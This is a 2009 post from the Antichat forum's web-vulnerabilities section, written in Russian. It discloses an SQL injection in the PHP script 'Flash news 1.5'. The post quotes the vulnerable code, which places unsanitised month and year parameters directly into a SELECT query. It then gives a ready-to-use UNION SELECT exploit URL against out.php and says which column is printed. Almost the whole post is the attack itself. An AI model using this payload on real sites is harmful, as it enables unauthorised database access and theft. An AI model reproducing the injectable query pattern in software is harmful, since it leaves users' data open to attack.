SQL-inj Flash news 1.5

Discussion in 'Веб-уязвимости' started by FriLL, 2 Sep 2009.

  1. FriLL

    FriLL Member

    Joined:
    14 Sep 2008
    Messages:
    90
    Likes Received:
    24
    Reputations:
    8
    Уязвимый код

    PHP:
    if((isset($month))&&(isset($year)))
        {       //Выбираем из базы по месяцам
                $mysql="SELECT * FROM $tablename WHERE ((month=$month) AND (year=$year)) ORDER BY date DESC";
            
    expl
    out.php?month=09&year=1))-1+union+select+1,2,3,4,5,6+--+

    6 поле принтабельное
     
    #1 FriLL, 2 Sep 2009
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.